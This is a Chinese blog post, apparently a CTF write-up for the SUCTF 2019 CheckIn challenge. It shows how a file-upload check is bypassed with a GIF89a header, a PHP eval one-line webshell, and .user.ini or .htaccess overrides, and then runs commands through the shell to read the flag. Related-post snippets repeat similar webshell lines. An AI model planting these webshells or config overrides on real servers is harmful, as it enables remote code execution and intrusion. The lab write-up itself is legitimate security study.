suctf-checkin+.user.ini+.htaccess绕过

最新推荐文章于 2022-08-09 22:15:38 发布

原创最新推荐文章于 2022-08-09 22:15:38 发布 · 331 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#网络安全

CTF训练日记同时被 2 个专栏收录

72 篇文章

订阅专栏

文件上传

3 篇文章

订阅专栏

文章目录

前言

由这个题和MRCTF中的我传你吗这两个题总结.htaccess和.user.ini绕过文件上传

wp

首先这个题就是用.user.ini或者.htaccess来绕过

我们传png文件，看到exif_imagetype:not image!

exif_imagetype，就是用来检查图像类型的

必须要gif文件，但是我们在文件内容上加个魔法头GIF89a,就可以绕过

我们用后缀为.user.ini或者.htaccess，发现只要加个魔法头都可以传进去

本来是直接用

<?php
    eval($_post[1]);   
?>

但是不行，返回contents有问题，说明对文件内容进行了过滤

我手工FUZZ了一下，<?被过滤了，其他都应该没有

然后换了个一句话木马

<script language='php'>eval($_POST[1]);</script>

我们可以传1.png文件进去，文件内容

GIF89a
一句话木马

再传.user.ini文件

文件内容
auto_prepend_file=/var/www/html/upload/....(路径)
auto_append_file=/var/www/html/upload/....(路径)

然后用蚁剑连接或者直接访问url，用命令执行

POST:1=var_dump(scandir("/"));找路径
然后1=var_dump(system("cat /f*"));

如果是.htaccess

只需要把文件内容改一下

SetHandler application/x-httpd-php,把全部文件都指定为php文件执行。

.user.ini绕过

.user.ini文件构成的PHP后门 - phith0n (wooyun.js.org)

.htaccess绕过

[CTF].htaccess的使用技巧总结_Y4tacker的博客-优快云博客

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Z3eyOnd

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

php 字符串异或绕过,CTF中php异或绕过preg_match

weixin_36073959的博客

03-19

3260

0x00:写在前面suctf的题目和强网杯都遇到这种类型题目了，正好就当做一个笔记来记录一下。$hhh= @$_GET[‘_‘];if(!$hhh){highlight_file(__FILE__);}if(strlen($hhh)>18){die(‘One inch long, one inch strong!‘);}if ( preg_match(‘/[\x00- 0-9A-Za-z\‘...

SUctf checkIn

舞动的獾

10-08

657

看了道上传的关于.user.ini的题目，这里试着做一下题目地址 buuctf checkln 打开题目，出现了简单的上传框试着上传php文件更改名称为phps,php3,php4,php5,Php,pphphp,都上传失败. 试试改为jpg 发现它对<？内容进行了检验。我们可以构造这种形式的木马 <script language="php"> @eval($_P...

参与评论您还未登录，请先登录后发表或查看评论

SUCTF CheckIn

weixin_45751765的博客

08-20

312

0x00前言 a.关于图片马图片马成功getshell的前提是靶标存在文件包含漏洞，而不是说直接说上传图片马(eg:1.jpg)就行了。你要让它能被服务端解析。 b.关于.user.ini 原文说的非常详细 https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html ...

[SUCTF 2019]CheckIn（.user.ini）

qq_44657899的博客

03-05

1495

模式含义 PHP_INI_USER 可在用户脚本（例如 ini_set()）或 Windows 注册表（自 PHP 5.3 起）以及 .user.ini 中设定 PHP_INI_PERDIR 可在 php.ini，.htaccess 或 httpd.conf 中设定 PHP_INI_SYSTEM 可在 php.ini 或 httpd.conf 中设定 PHP_INI_ALL 可在任何地方设定

.user.ini文件构成的PHP后门

11-14

735

http://drops.wooyun.org/tips/3424 0x00 背景这个估计很多同学看了不屑，认为是烂大街的东西了： .htaccess文件构成的PHP后门那么我来个新的吧：.user.ini。它比.htaccess用的更广，不管是nginx/apache/IIS，只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastc...

[SUCTF 2019]CheckIn (.htaccess和.user.ini)

开心星人的博客

08-09

609

他们的作用就是指定一个文件（1.jpg），那么该文件就会被包含在要执行的php文件中（index.php）但不知道什么原因(可能是时间限制，自动删除了)，我们刚才上传的evil.jpg不在了，重新上传一下即可。然后尝试使用antsword连接，但是发现连不上，不太确定哪里出了问题。意思是如果文件中有一个evil.jpg的文件，他就会被解析为.php。将后缀名改成jpg(虽然绕过了，但是解析不了，所以没啥用)尝试.htaccess和.user.ini。尝试.user.ini。成功了，但是无法解析。......

文件上传之.htaccess和.user.ini

m0_46587008的博客

05-20

1768

文章目录前言一、基本描述二、配置与使用三、实战1、总结前言提示：最近写文件上传的题目经常碰到关于.htaccess和.user.ini文件的使用问题，我不了解Apache和php配置文件，所以想借着这次机会好好着重了解一些这两个配置文件一、基本描述 1、.htaccess。百科对于.htaccess的解读是：htaccess文件是Apache服务器中的一个配置文件，它负责相关目录下的网页配置。通过htaccess文件，可以帮我们实现：网页301重定向、自定义404错误页面、改变文件扩展名、允许/

Buuctf（文件上传.uesr.ini绕过）[SUCTF 2019]CheckIn 1

m0_64444909的博客

05-21

2575

解题思路一.打开题目：发现一个上传框，猜测上传一句话木马，获取后台shell 二.上传.php .phtml .等有关的PHP文件，都显示非法后缀三.上传.htaccess文件

SUCTF web CheckIn

weixin_42499640的博客

08-19

2801

记录一道SUCTF的web1 据菠萝师傅说这是他们出的签到题我tcl

ctfshow web13 文件上传.user.ini

m0_46412682的博客

07-16

2335

ctfshow web13 文件上传开始的页面先上传一张正常的照片，显示error file size，这张图片是886k,再上传一张小的照片还是error file size 不管先，上传一句话木马1.php,提示错误，应该是过滤了后缀名现在上传1.txt，内容为<?php eval($_GET[‘w’]);?>，还是文件大小问题内容改小一点<?php eval($_GET[w]); 这里我们实现能不能上传.htaccess文件，这里是上传不了之前再buuctf中有道也是文件

buuctf web 13、[SUCTF 2019]CheckIn

m0_46412682的博客

07-16

1166

buuctf web 13、[SUCTF 2019]CheckIn 开始的页面 1、先上传一个正常的照片 2、再上传一个php文件，提示illegal suffix 3、上传一个只含一句话木马的后缀为gif的文件，提示内容中有<? 既然过滤了<? ，所以用 4、上传7.gif，但是提示不是gif类型,exif_imagetype是文件内容的头部看是否是对应的照片类型我们只需要再文件中填写对应的照片头部上传成功 5、但是要怎么样才能让照片木马执行，我们想到.htaccess

[ctf web]上传user.ini绕过文件上传漏洞 ctfshhow-web153 wp

ShenZ的博客

07-27

1205

这个太糟糕了，我typora截图好多，不知道有没有放乱掉如果你目录下有user.ini会先去识别里面的配置，但是只有 PHP_INI_PERDIR 和 PHP_INI_USER 模式可以找到这两个auto_append_file和auto_prepend_file，作用：一个相当于在每个php文件尾加上 include(“xxxx”) 一个相当于文件头加上 include(“xxx”) 其中xxx就是 auto_append_file的值。因为.user.ini只对他同一目录下的文件起作用，也就是

[SUCTF 2019]CheckIn

热门推荐

沐目的博客

10-22

1万+

一、知识点 1.1exif_imagetype() 打开发现是上传，发现可以上传jpg等格式的文件。然后上传txt格式的文件，发现后台好像是通过exif_imagetype函数判断的— 判断一个图像的类型。 <?php if (exif_imagetype("image.gif") != IMAGETYPE_GIF) { echo "The picture is not a gif"...

phar反序列化+两道CTF例题

unexpectedthing的博客

02-14

8365

Phar反序列化 phar文件本质上是一种压缩文件，会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时，会自动反序列化meta-data内的内容。(漏洞利用点) 什么是phar文件在软件中，PHAR（PHP归档）文件是一种打包格式，通过将许多PHP代码文件和其他资源（例如图像，样式表等）捆绑到一个归档文件中来实现应用程序和库的分发 php通过用户定义和内置的“流包装器”实现复杂的文件处理功能。内置包装器可用于文件系统函数，如(fopen(),copy(),file

文件包含漏洞+php伪协议

unexpectedthing的博客

11-11

8030

文章目录常见的文件包含函数基本绕过：利用php伪协议1.php://input2.php://filter3.data协议4.zip协议5.bzip2://协议6.zlib://协议7. phar://协议8..file协议日志包含介绍利用条件漏洞利用流程日志文件路径远程文件包含条件流程PHPSESSION包含包含/proc/self/environ文件包含临时文件过程包含上传文件绕过类型指定后缀绕过利用长度截断%00截断url指定前缀截断目录遍历编码参考文献常见的文件包含函数 php文件包含函数有下面四

CTF训练之路2--ctfshow内部赛

unexpectedthing的博客

11-07

7331

文章目录签到登录就有flag出题人不想跟你说话.jpg蓝廋一览无余签退签到一进去就是login界面,F12看到有个register.php，说明就是一个二次注入的sql注入题。所谓二次注入，就是再register中构造sql语句，然后登录login来触发。找到羽师傅的脚本 import requests import re url_register = "http://7b093e85-e6d5-4784-adab-49ba20992eda.challenge.ctf.show/register.

SSRF---gopher和dict打redis

unexpectedthing的博客

12-01

6670

前言之前关于SSRF打redis(redis的未授权漏洞)都没咋总结，现在总结一下。 redis简介 redis是一个key-value存储系统，是一个开源（BSD许可）的，内存中的数据结构存储系统，它可以用作数据库、缓存和消息中间件。它支持多种类型的数据结构，如字符串（strings），散列（hashes），列表（lists），集合（sets），有序集合（sorted sets）与范围查询， bitmaps， hyperloglogs 和地理空间（geospatial）索引半径查询。

SSRF--gopher协议打FastCGI

unexpectedthing的博客

11-30

6403

FastCGI 定义: 什么是CGI CGI全称"通用网关接口"（Common Gateway Interface），用于HTTP服务器与其它机器上的程序服务通信交流的一种工具，CGI程序须运行在网络服务器上。传统CGI接口方式的主要缺点是性能较差，因为每次HTTP服务器遇到动态程序时都需要重启解析器来执行解析，然后结果被返回给HTTP服务器。这在处理高并发访问几乎是不可用的，因此就诞生了FastCGI。另外传统的CGI接口方式安全性也很差。什么是FastCGI FastCGI是一个可伸缩地、高速地

php原生类的总结

unexpectedthing的博客

12-12

6184

文章目录前言利用Error/Exception 内置类进行 XSSError内置类Exception内置类[BJDCTF 2nd]xss之光使用 Error/Exception 内置类绕过哈希比较Error类Exception 类[2020 极客大挑战]GreatphpSoapClient类来进行SSRF 前言之所以这个总结，极客大挑战的SoEzunser考到了php原生类来遍历目录其实，在CTF题目中，可以利用php原生类来进行XSS,反序列化，SSRF，XXE和读文件的思路通过遍历看一下php的内

File "weibo_checkin.py", line 1 autojs/新浪微博-早起打卡.js / ^ SyntaxError: invalid syntax

04-30

这个错误提示显示在第1行，可能是因为你的代码有语法错误。根据错误信息看起来，你的代码文件名是"weibo_checkin.py"，但是错误信息显示出现了一个文件路径"autojs/新浪微博-早起打卡.js"，这个路径可能不应该出现在代码文件中。你可以检查一下代码文件的内容，尤其是第1行，看是否有不正确的语法或者文件路径等问题。如果你无法解决问题，可以将代码文件的内容发送给我，让我帮你检查。